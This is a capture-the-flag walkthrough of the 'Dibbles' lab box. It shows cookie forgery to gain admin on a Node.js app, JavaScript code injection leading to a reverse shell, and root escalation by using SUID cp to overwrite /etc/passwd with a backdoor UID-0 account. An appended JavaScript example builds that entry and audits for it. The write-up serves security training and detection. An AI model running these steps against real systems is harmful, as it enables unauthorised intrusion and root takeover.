Dibbles
Exploitation Guide for Dibbles | Proving Grounds
In this walkthrough we exploit a Node.js web application with a weak security configuration to get remote code execution (RCE), then abuse a SUID binary to escalate our privileges to root.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/dibble/scans]
└─$ sudo nmap $ip -sVCS -O -oN nmapInitial.txt
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.49.245
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
| 3072 9d:3f:eb:1b:aa:9c:1e:b1:30:9b:23:53:4b:cf:59:75 (RSA)
| 256 cd:dc:05:e6:e3:bb:12:33:f7:09:74:50:12:8a:85:64 (ECDSA)
|_ 256 a0:90:1f:50:78:b3:9e:41:2a:7f:5c:6f:4d:0e:a1:fa (ED25519)
80/tcp open http Apache httpd 2.4.46 ((Fedora))
|_http-generator: Drupal 9 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.46 (Fedora)
|_http-title: Home | Hacking Articles
3000/tcp open http Node.js (Express middleware)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: OS: Unix
nikto and gobuster were tried first but turned up nothing useful, so we enumerate the Node.js application on port 3000 manually.
We have no credentials at this point, but we can register an account. Once logged in there is a form for writing a log message, but we are not permitted to use it: only an admin is allowed to update logs.
Looking at the request in Burp, we notice a cookie named userLevel whose value is base64-encoded. Decoding it gives default. The server apparently derives our role from this client-controlled cookie, so we test whether setting userLevel=admin lets us edit the log.
Intercept the request in a proxy (Burp/ZAP), replace the cookie value and forward the request. The new value has to be encoded the same way the original is: base64-encode admin (YWRtaW4=), then URL-encode the result so the = padding survives in the Cookie header (YWRtaW4%3D).
As shown below, the log can now be updated. The feature is also vulnerable to code injection: since the back end runs on Node.js, the log message is evaluated as JavaScript. Test it with a simple expression such as 1+1, which is executed when the log is opened. We use this to get RCE.
Get a Node.js reverse shell payload from:
Copy the payload, changing the IP and port to those of your attacking machine, start a netcat listener on the chosen port and post the update. The shell comes back as the user benjamin:
┌──(imtodess㉿deathnote)-[~/…/pg/dibble/results/scans]
└─$ nc -nvlp 3000
listening on [any] 3000 ...
connect to [192.168.49.245] from (UNKNOWN) [192.168.245.110] 39584
whoami
benjamin
id
uid=1000(benjamin) gid=1000(benjamin) groups=1000(benjamin)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")' # upgrade to an interactive TTY shell
[benjamin@dibble app]$ cd
[benjamin@dibble ~]$ ls
app local.txt
[benjamin@dibble ~]$ cat local.txt
5485440<REDACTED>fc58fda369
Use find to search for binaries with the SUID bit set:
[benjamin@dibble tmp]$ find / -type f -perm /4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/fusermount
/usr/bin/cp
/usr/bin/umount
/usr/bin/sudo
/usr/bin/chage
/usr/bin/mount
/usr/bin/passwd
/usr/bin/su
/usr/bin/newgrp
/usr/sbin/grub2-set-bootflag
/usr/sbin/unix_chkpwd
/usr/sbin/pam_timestamp_check
cp has the SUID bit set, so it runs with root's effective UID and can write to files that only root may modify. We exploit this to get root; the technique is described in the following article:
Create a password hash with openssl (the password here is pass123):
[benjamin@dibble tmp]$ openssl passwd -1 -salt ignite pass123
$1$ignite$3eTbJm98O9Hz.k1NTdNxe1
Then copy the contents of /etc/passwd into a file we can edit:
# create new passwd file in /tmp directory
[benjamin@dibble tmp]$ cat /etc/passwd > passwd
Append the following line to the new passwd file. It defines a user named imtodess with UID 0 and GID 0, i.e. root privileges, whose password hash is the one generated above. Because the hash sits directly in the second field instead of an x, /etc/shadow is never consulted for this account.
[benjamin@dibble tmp]$ echo 'imtodess:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash' >> passwd
Copy the edited file over /etc/passwd. Normally this would fail because the file is owned by root, but cp is SUID, so it runs as root and can overwrite the existing root-owned file. Keep an untouched copy of the original first if you need to restore it afterwards.
[benjamin@dibble tmp]$ cp passwd /etc/passwd
Now switch to the new user with the password pass123 and you are root:
[benjamin@dibble tmp]$ su imtodess
Password:
[root@dibble tmp]# whoami
root
[root@dibble tmp]# id
uid=0(root) gid=0(root) groups=0(root)
[root@dibble tmp]# cd
[root@dibble ~]# ls
proof.txt
[root@dibble ~]# cat proof.txt
4e08440<REDACTED>2ec3c285
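To show what the appended line must contain and how the change looks from the defender's side, here is an added JavaScript example (not part of the original writeup). It builds the entry, appends it to a constructed /etc/passwd sample the way the `>> passwd` step does, and audits the result for the two tell-tale signs of this technique: an extra UID-0 account and a password hash stored in passwd rather than shadow. The username and hash are the ones used on the page; the sample passwd lines and all function names are constructed.

```javascript
// Added example, not from the writeup. Works on a constructed /etc/passwd snippet.
const SAMPLE_PASSWD = [
  'root:x:0:0:root:/root:/bin/bash',
  'bin:x:1:1:bin:/bin:/sbin/nologin',
  'benjamin:x:1000:1000::/home/benjamin:/bin/bash',
].join('\n') + '\n';

// Hash from the page: openssl passwd -1 -salt ignite pass123
const HASH = '$1$ignite$3eTbJm98O9Hz.k1NTdNxe1';

// Build the seven-field passwd line: name:hash:uid:gid:gecos:home:shell.
// A hash in field 2 (instead of 'x') means the account is authenticated from
// passwd itself and /etc/shadow is never consulted.
function buildPasswdEntry(name, hash, opts = {}) {
  const { uid = 0, gid = 0, gecos = 'root', home = '/root', shell = '/bin/bash' } = opts;
  if (!/^[a-z_][a-z0-9_-]*$/.test(name)) throw new Error('invalid username');
  if ([hash, gecos, home, shell].some((f) => /[:\n]/.test(f))) {
    throw new Error('field may not contain ":" or a newline');
  }
  return `${name}:${hash}:${uid}:${gid}:${gecos}:${home}:${shell}`;
}

// Parse passwd text into records, rejecting malformed lines (a malformed
// /etc/passwd is how this technique locks everyone out of the box).
function parsePasswd(text) {
  return text.split('\n').filter(Boolean).map((line, i) => {
    const f = line.split(':');
    if (f.length !== 7) throw new Error(`line ${i + 1}: expected 7 fields, got ${f.length}`);
    return { name: f[0], hash: f[1], uid: Number(f[2]), gid: Number(f[3]), gecos: f[4], home: f[5], shell: f[6] };
  });
}

// Attacker step: the copy of passwd with the new entry appended.
function addBackdoor(passwdText, entry) {
  const sep = passwdText.endsWith('\n') ? '' : '\n';
  return `${passwdText}${sep}${entry}\n`;
}

// Defender check: any UID-0 account other than root, or any account whose
// second field is not the shadow marker 'x', is a finding.
function auditPasswd(text) {
  const findings = [];
  for (const e of parsePasswd(text)) {
    if (e.uid === 0 && e.name !== 'root') findings.push(`${e.name}: uid 0`);
    if (e.hash !== 'x') findings.push(`${e.name}: hash stored in passwd`);
  }
  return findings;
}

const ENTRY = buildPasswdEntry('imtodess', HASH);
const BACKDOORED = addBackdoor(SAMPLE_PASSWD, ENTRY);

console.log(ENTRY);                     // the line appended on the page
console.log(auditPasswd(SAMPLE_PASSWD)); // []
console.log(auditPasswd(BACKDOORED));    // [ 'imtodess: uid 0', 'imtodess: hash stored in passwd' ]
```

The same audit run against the live file after the exercise shows what a host-based check or a file-integrity monitor on /etc/passwd would have flagged; the modified file also has a fresh mtime and, because cp truncated and rewrote it, a different inode content hash from the packaged baseline.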